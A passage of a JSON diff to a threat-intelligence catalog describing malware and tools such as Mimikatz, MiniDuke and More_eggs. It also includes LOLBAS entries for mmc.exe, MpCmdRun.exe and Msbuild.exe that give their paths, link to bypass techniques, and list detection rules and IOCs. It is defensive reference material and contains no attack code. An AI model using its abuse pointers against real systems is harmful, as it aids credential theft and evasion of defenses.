"15ff1ce0-44f0-4f1d-a4ef-83444570e572", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "a57b52c7-9f64-4ffe-a7c3-0de738fb2af1", + "type": "used-by" + }, + { + "dest-uuid": "646e35d2-75de-4c1d-8ad3-616d3e155c5e", + "type": "used-by" + }, + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "72d9bea7-9ca1-43e6-8702-2fb7fb1355de", + "type": "used-by" + }, + { + "dest-uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", + "type": "used-by" + }, + { + "dest-uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "type": "used-by" + }, + { + "dest-uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "type": "used-by" + }, + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "used-by" + }, + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "7c3ef21c-0e1c-43d5-afb0-3a07c5a66937", + "type": "used-by" + }, + { + "dest-uuid": "c8cc6ce8-d421-42e6-a6eb-2ea9d2d9ab07", + "type": "used-by" + }, + { + "dest-uuid": "3a54b8dc-a231-4db8-96da-1c0c1aa396f6", + "type": "used-by" + }, + { + "dest-uuid": "e5b0da2b-12bc-4113-9459-9c51329c9ae0", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "f0943620-7bbb-4239-8ed3-c541c36baaa1", + "type": "used-by" + }, + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "3c7ad595-1940-40fc-b9ca-3e649c1e5d87", + "type": "used-by" + }, + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "used-by" + }, + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "472080b0-e3d4-4546-9272-c4359fe856e1", + "type": "used-by" + }, + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "fcaadc12-7c17-4946-a9dc-976ed610854c", + "type": "used-by" + }, + { + "dest-uuid": "b5c28235-d441-40d9-8da2-d49ba2f2568b", + "type": "used-by" + }, + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "86b97a39-49c3-431e-bcc8-f4e13dbfcdf5", + "type": "used-by" + }, + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "6eb50f82-86cc-4eff-b1d1-66e1c6fd74f3", + "type": "used-by" + }, + { + "dest-uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "type": "used-by" + }, + { + "dest-uuid": "9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c", + "type": "used-by" + }, + { + "dest-uuid": "a3b39b07-0bfa-4c69-9f01-acf7dc6033b4", + "type": "used-by" + }, + { + "dest-uuid": "0060bb76-6713-4942-a4c0-d4ae01ec2866", + "type": "used-by" + }, + { + "dest-uuid": "58db02e6-d908-47c2-bc82-ed58ada61331", + "type": "used-by" + }, + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "eecf7289-294f-48dd-a747-7705820f4735", + "type": "used-by" + }, + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "used-by" + }, + { + "dest-uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "type": "used-by" + }, + { + "dest-uuid": "570198e3-b59c-5772-b1ee-15d7ea14d48a", + "type": "used-by" + }, + { + "dest-uuid": "60936d3c-37ed-4116-a407-868da3aa4446", + "type": "used-by" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "type": "similar" + } + ], + "uuid": "b8e7c0b4-49e4-4e8d-9467-b17f305ddf16", + "value": "Mimikatz" + }, + { + "description": "[MimiPenguin](https://app.tidalcyber.com/software/42350632-b59a-4cc5-995e-d95d8c608553) is a credential dumper, similar to [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16), designed specifically for Linux platforms. [[MimiPenguin GitHub May 2017](https://app.tidalcyber.com/references/b10cd6cc-35ed-4eac-b213-110de28f33ef)]", + "meta": { + "platforms": [ + "Linux" + ], + "software_attack_id": "S0179", + "source": "MITRE", + "tags": [ + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "325c11be-e1ee-47db-afa6-44ac5d16f0e7", + "type": "used-by" + }, + { + "dest-uuid": "5a33468d-844d-4b1f-98c9-0e786c556b27", + "type": "similar" + } + ], + "uuid": "42350632-b59a-4cc5-995e-d95d8c608553", + "value": "MimiPenguin" + }, + { + "description": "[Miner-C](https://app.tidalcyber.com/software/c0dea9db-1551-4f6c-8a19-182efc34093a) is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. [[Softpedia MinerC](https://app.tidalcyber.com/references/087b9bf1-bd9e-4cd6-a386-d9d2c812c927)]", + "meta": { + "platforms": [], + "software_attack_id": "S0133", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "17dec760-9c8f-4f1b-9b4b-0ac47a453234", + "type": "similar" + } + ], + "uuid": "c0dea9db-1551-4f6c-8a19-182efc34093a", + "value": "Miner-C" + }, + { + "description": "[MiniDuke](https://app.tidalcyber.com/software/2bb16809-6bc3-46c3-b28a-39cb49410340) is malware that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) from 2010 to 2015. The [MiniDuke](https://app.tidalcyber.com/software/2bb16809-6bc3-46c3-b28a-39cb49410340) toolset consists of multiple downloader and backdoor components. The loader has been used with other [MiniDuke](https://app.tidalcyber.com/software/2bb16809-6bc3-46c3-b28a-39cb49410340) components as well as in conjunction with [CosmicDuke](https://app.tidalcyber.com/software/43b317c6-5b4f-47b8-b7b4-15cd6f455091) and [PinchDuke](https://app.tidalcyber.com/software/ba2208c8-5e1e-46cd-bef1-ffa7a2be3be4). [[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0051", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", + "type": "similar" + } + ], + "uuid": "2bb16809-6bc3-46c3-b28a-39cb49410340", + "value": "MiniDuke" + }, + { + "description": "[MirageFox](https://app.tidalcyber.com/software/535f1b97-7a70-4d18-be4e-3a9f74ccf78a) is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012. [[APT15 Intezer June 2018](https://app.tidalcyber.com/references/0110500c-bf67-43a5-97cb-16eb6c01040b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0280", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "type": "used-by" + }, + { + "dest-uuid": "e3cedcfe-6515-4348-af65-7f2c4157bf0d", + "type": "similar" + } + ], + "uuid": "535f1b97-7a70-4d18-be4e-3a9f74ccf78a", + "value": "MirageFox" + }, + { + "description": "[Misdat](https://app.tidalcyber.com/software/4048afa2-79c8-4d38-8219-2207adddd884) is a backdoor that was used in [Operation Dust Storm](https://app.tidalcyber.com/campaigns/af0c0f55-dc4f-4cb5-9350-3a2d7c07595f) from 2010 to 2011.[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0083", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0db09158-6e48-4e7c-8ce7-2b10b9c0c039", + "type": "similar" + } + ], + "uuid": "4048afa2-79c8-4d38-8219-2207adddd884", + "value": "Misdat" + }, + { + "description": "[Mis-Type](https://app.tidalcyber.com/software/fe554d2e-f974-41d6-8e7a-701bd758355d) is a backdoor hybrid that was used in [Operation Dust Storm](https://app.tidalcyber.com/campaigns/af0c0f55-dc4f-4cb5-9350-3a2d7c07595f) by 2012.[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0084", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "e1161124-f22e-487f-9d5f-ed8efc8dcd61", + "type": "similar" + } + ], + "uuid": "fe554d2e-f974-41d6-8e7a-701bd758355d", + "value": "Mis-Type" + }, + { + "description": "[Mivast](https://app.tidalcyber.com/software/f603ea32-91c3-4b62-a60f-57670433b080) is a backdoor that has been used by [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b). It was reportedly used in the Anthem breach. [[Symantec Black Vine](https://app.tidalcyber.com/references/0b7745ce-04c0-41d9-a440-df9084a45d09)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0080", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "43f826a1-e8c8-47b8-9b00-38e1b3e4293b", + "type": "used-by" + }, + { + "dest-uuid": "fbb470da-1d44-4f29-bbb3-9efbe20f94a3", + "type": "similar" + } + ], + "uuid": "f603ea32-91c3-4b62-a60f-57670433b080", + "value": "Mivast" + }, + { + "description": "[[Mmc.exe - LOLBAS Project](/references/490b6769-e386-4a3d-972e-5a919cb2f6f5)]", + "meta": { + "id": "9e2cab0f-efe8-4d8e-b293-e54ce4fb5db3", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "8c7acae2-f844-4e01-86d8-18c3ea90963f", + "type": "similar" + } + ], + "uuid": "08c13774-647c-472d-8e6e-d1fb2f21e67d", + "value": "Mmc.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Load snap-ins to locally and remotely manage Windows systems\n\n**Author:** @bohops\n\n**Paths:**\n* C:\\Windows\\System32\\mmc.exe\n* C:\\Windows\\SysWOW64\\mmc.exe\n\n**Resources:**\n* [https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/](https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/)\n* [https://offsec.almond.consulting/UAC-bypass-dotnet.html](https://offsec.almond.consulting/UAC-bypass-dotnet.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_mmc_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml)\n* Sigma: [file_event_win_uac_bypass_dotnet_profiler.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml)[[Mmc.exe - LOLBAS Project](/references/490b6769-e386-4a3d-972e-5a919cb2f6f5)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5126", + "source": "Tidal Cyber", + "tags": [ + "f9e6382f-e41e-438e-bd7e-57a57046d9e6", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "08c13774-647c-472d-8e6e-d1fb2f21e67d", + "type": "similar" + } + ], + "uuid": "8c7acae2-f844-4e01-86d8-18c3ea90963f", + "value": "Mmc" + }, + { + "description": "[MobileOrder](https://app.tidalcyber.com/software/116f913c-0d5e-43d1-ba0d-3a12127af8f6) is a Trojan intended to compromise Android mobile devices. It has been used by [Scarlet Mimic](https://app.tidalcyber.com/groups/6c1bdc51-f633-4512-8b20-04a11c2d97f4). [[Scarlet Mimic Jan 2016](https://app.tidalcyber.com/references/f84a5b6d-3af1-45b1-ac55-69ceced8735f)]", + "meta": { + "platforms": [], + "software_attack_id": "S0079", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6c1bdc51-f633-4512-8b20-04a11c2d97f4", + "type": "used-by" + }, + { + "dest-uuid": "463f68f1-5cde-4dc2-a831-68b73488f8f4", + "type": "similar" + } + ], + "uuid": "116f913c-0d5e-43d1-ba0d-3a12127af8f6", + "value": "MobileOrder" + }, + { + "description": "[MoleNet](https://app.tidalcyber.com/software/7ca5debb-f813-4e06-98f8-d1186552e5d2) is a downloader tool with backdoor capabilities that has been observed in use since at least 2019.[[Cybereason Molerats Dec 2020](https://app.tidalcyber.com/references/81a10a4b-c66f-4526-882c-184436807e1d)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0553", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "679b7b6b-9659-4e56-9ffd-688a6fab01b6", + "type": "used-by" + }, + { + "dest-uuid": "8a59f456-79a0-4151-9f56-9b1a67332af2", + "type": "similar" + } + ], + "uuid": "7ca5debb-f813-4e06-98f8-d1186552e5d2", + "value": "MoleNet" + }, + { + "description": "[Mongall](https://app.tidalcyber.com/software/7f5355b3-e819-4c82-a0fa-b80fda8fd6e6) is a backdoor that has been used since at least 2013, including by [Aoqin Dragon](https://app.tidalcyber.com/groups/454402a3-0503-45bf-b2e0-177fa2e2d412).[[SentinelOne Aoqin Dragon June 2022](https://app.tidalcyber.com/references/b4e792e0-b1fa-4639-98b1-233aaec53594)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1026", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "454402a3-0503-45bf-b2e0-177fa2e2d412", + "type": "used-by" + }, + { + "dest-uuid": "6fb36c6f-bb3d-4ed6-9471-cb9933e5c154", + "type": "similar" + } + ], + "uuid": "7f5355b3-e819-4c82-a0fa-b80fda8fd6e6", + "value": "Mongall" + }, + { + "description": "[MoonWind](https://app.tidalcyber.com/software/a699f32f-6596-4060-8fcd-42587a844b80) is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand. [[Palo Alto MoonWind March 2017](https://app.tidalcyber.com/references/4f3d7a08-2cf5-49ed-8bcd-6df180f3d194)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0149", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "9ea525fa-b0a9-4dde-84f2-bcea0137b3c1", + "type": "similar" + } + ], + "uuid": "a699f32f-6596-4060-8fcd-42587a844b80", + "value": "MoonWind" + }, + { + "description": "[[Crowdstrike GTR2020 Mar 2020](https://app.tidalcyber.com/references/a2325ace-e5a1-458d-80c1-5037bd7fa727)]", + "meta": { + "id": "fae5b21a-80f3-4ba5-a5c6-ff5c047ef62d" + }, + "related": [ + { + "dest-uuid": "69f202e7-4bc9-4f4f-943f-330c053ae977", + "type": "similar" + } + ], + "uuid": "d2877108-0856-4969-8eb5-421cd2d7acf8", + "value": "SKID" + }, + { + "description": "[[Security Intelligence More Eggs Aug 2019](https://app.tidalcyber.com/references/f0a0286f-adb9-4a6e-85b5-5b0f45e6fbf3)][[Visa FIN6 Feb 2019](https://app.tidalcyber.com/references/9e9e8811-1d8e-4400-8688-e634f859c4e0)]", + "meta": { + "id": "4577117f-d47d-4867-bfc0-15f1835d571b" + }, + "related": [ + { + "dest-uuid": "69f202e7-4bc9-4f4f-943f-330c053ae977", + "type": "similar" + } + ], + "uuid": "8e995f3c-8e8d-4f7e-b91c-9c9d02ae1448", + "value": "Terra Loader" + }, + { + "description": "[[Security Intelligence More Eggs Aug 2019](https://app.tidalcyber.com/references/f0a0286f-adb9-4a6e-85b5-5b0f45e6fbf3)]", + "meta": { + "id": "04730daa-f110-4c35-8a36-745ea17e000f" + }, + "related": [ + { + "dest-uuid": "69f202e7-4bc9-4f4f-943f-330c053ae977", + "type": "similar" + } + ], + "uuid": "96f03902-3d1b-49cf-a0df-8add8434f012", + "value": "SpicyOmelette" + }, + { + "description": "[More_eggs](https://app.tidalcyber.com/software/69f202e7-4bc9-4f4f-943f-330c053ae977) is a JScript backdoor used by [Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) and [FIN6](https://app.tidalcyber.com/groups/fcaadc12-7c17-4946-a9dc-976ed610854c). Its name was given based on the variable \"More_eggs\" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4. [[Talos Cobalt Group July 2018](https://app.tidalcyber.com/references/7cdfd0d1-f7e6-4625-91ff-f87f46f95864)][[Security Intelligence More Eggs Aug 2019](https://app.tidalcyber.com/references/f0a0286f-adb9-4a6e-85b5-5b0f45e6fbf3)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0284", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "58db02e6-d908-47c2-bc82-ed58ada61331", + "type": "used-by" + }, + { + "dest-uuid": "4bdc62c9-af6a-4377-8431-58a6f39235dd", + "type": "used-by" + }, + { + "dest-uuid": "fcaadc12-7c17-4946-a9dc-976ed610854c", + "type": "used-by" + }, + { + "dest-uuid": "bfd2738c-8b43-43c3-bc9f-d523c8e88bf4", + "type": "similar" + }, + { + "dest-uuid": "d2877108-0856-4969-8eb5-421cd2d7acf8", + "type": "similar" + }, + { + "dest-uuid": "8e995f3c-8e8d-4f7e-b91c-9c9d02ae1448", + "type": "similar" + }, + { + "dest-uuid": "96f03902-3d1b-49cf-a0df-8add8434f012", + "type": "similar" + } + ], + "uuid": "69f202e7-4bc9-4f4f-943f-330c053ae977", + "value": "More_eggs" + }, + { + "description": "[Mori](https://app.tidalcyber.com/software/385e1eaf-9ba8-4381-981a-3c7af718a77d) is a backdoor that has been used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) since at least January 2022.[[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)][[CYBERCOM Iranian Intel Cyber January 2022](https://app.tidalcyber.com/references/671e1559-c7dc-4cb4-a9a1-21776f2ae56a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1047", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "7e100ca4-e639-48d9-9a9d-8ad84aa7b448", + "type": "similar" + } + ], + "uuid": "385e1eaf-9ba8-4381-981a-3c7af718a77d", + "value": "Mori" + }, + { + "description": "[Mosquito](https://app.tidalcyber.com/software/c3939dad-d728-4ddb-804e-cf1e3743a55d) is a Win32 backdoor that has been used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2). [Mosquito](https://app.tidalcyber.com/software/c3939dad-d728-4ddb-804e-cf1e3743a55d) is made up of three parts: the installer, the launcher, and the backdoor. The main backdoor is called CommanderDLL and is launched by the loader program. [[ESET Turla Mosquito Jan 2018](https://app.tidalcyber.com/references/cd177c2e-ef22-47be-9926-61e25fd5f33b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0256", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "92b55426-109f-4d93-899f-1833ce91ff90", + "type": "similar" + } + ], + "uuid": "c3939dad-d728-4ddb-804e-cf1e3743a55d", + "value": "Mosquito" + }, + { + "description": "[[MpCmdRun.exe - LOLBAS Project](/references/2082d5ca-474f-4130-b275-c1ac5e30064c)]", + "meta": { + "id": "ed767e80-c2bc-4e9a-8977-c918db11259f", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "ec54a1e4-92d4-4503-a510-a18989f1f8f3", + "type": "similar" + } + ], + "uuid": "78bdf160-7b3c-4832-a3fc-1caa419309c7", + "value": "MpCmdRun.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary part of Windows Defender. Used to manage settings in Windows Defender\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe\n* C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe\n* C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe\n\n**Resources:**\n* [https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus](https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus)\n* [https://twitter.com/mohammadaskar2/status/1301263551638761477](https://twitter.com/mohammadaskar2/status/1301263551638761477)\n* [https://twitter.com/Oddvarmoe/status/1301444858910052352](https://twitter.com/Oddvarmoe/status/1301444858910052352)\n* [https://twitter.com/NotMedic/status/1301506813242867720](https://twitter.com/NotMedic/status/1301506813242867720)\n\n**Detection:**\n* Sigma: [win_susp_mpcmdrun_download.yml](https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml)\n* Elastic: [command_and_control_remote_file_copy_mpcmdrun.toml](https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml)\n* IOC: MpCmdRun storing data into alternate data streams.\n* IOC: MpCmdRun retrieving a file from a remote machine or the internet that is not expected.\n* IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.\n* IOC: Monitor for the creation of %USERPROFILE%\\AppData\\Local\\Temp\\MpCmdRun.log\n* IOC: User Agent is \"MpCommunication\"[[MpCmdRun.exe - LOLBAS Project](/references/2082d5ca-474f-4130-b275-c1ac5e30064c)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5127", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "78bdf160-7b3c-4832-a3fc-1caa419309c7", + "type": "similar" + } + ], + "uuid": "ec54a1e4-92d4-4503-a510-a18989f1f8f3", + "value": "MpCmdRun" + }, + { + "description": "[[LOLBAS Msbuild](/references/de8e0741-255b-4c41-ba50-248ac5acc325)]", + "meta": { + "id": "43ae4958-8850-4fef-8f6a-b7a22355953a", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "1f500e4c-25a1-4570-a3ba-5c9cd463afde", + "type": "similar" + } + ], + "uuid": "7e97093f-629d-4de9-8c28-3adc429e3abb", + "value": "Msbuild.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used to compile and execute code\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe\n* C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe\n* C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe\n* C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe\n\n**Resources:**\n* [https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md)\n* [https://github.com/Cn33liz/MSBuildShell](https://github.com/Cn33liz/MSBuildShell)\n* [https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/](https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/)\n* [https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/](https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/)\n* [https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191](https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191)\n* [https://github.com/LOLBAS-Project/LOLBAS/issues/165](https://github.com/LOLBAS-Project/LOLBAS/issues/165)\n* [https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files](https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files)\n* [https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events](https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events)\n\n**Detection:**\n* Sigma: [file_event_win_shell_write_susp_directory.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml)\n* Sigma: [proc_creation_win_msbuild_susp_parent_process.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml)\n* Sigma: [net_connection_win_silenttrinity_stager_msbuild_activity.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml)\n* Splunk: [suspicious_msbuild_spawn.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml)\n* Splunk: [suspicious_msbuild_rename.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml)\n* Splunk: [msbuild_suspicious_spawned_by_script_process.yml](https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml)\n* Elastic: [defense_evasion_msbuild_beacon_sequence.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml)\n* Elastic: [defense_evasion_msbuild_making_network_connections.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml)\n* Elastic: [defense_evasion_execution_msbuild_started_by_script.toml](https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml)\n* Elastic: [defense_evasion_execution_msbuild_started_by_office_app.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml)\n* Elastic: [defense_evasion_execution_msbuild_started_renamed.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml)\n* BlockRule: 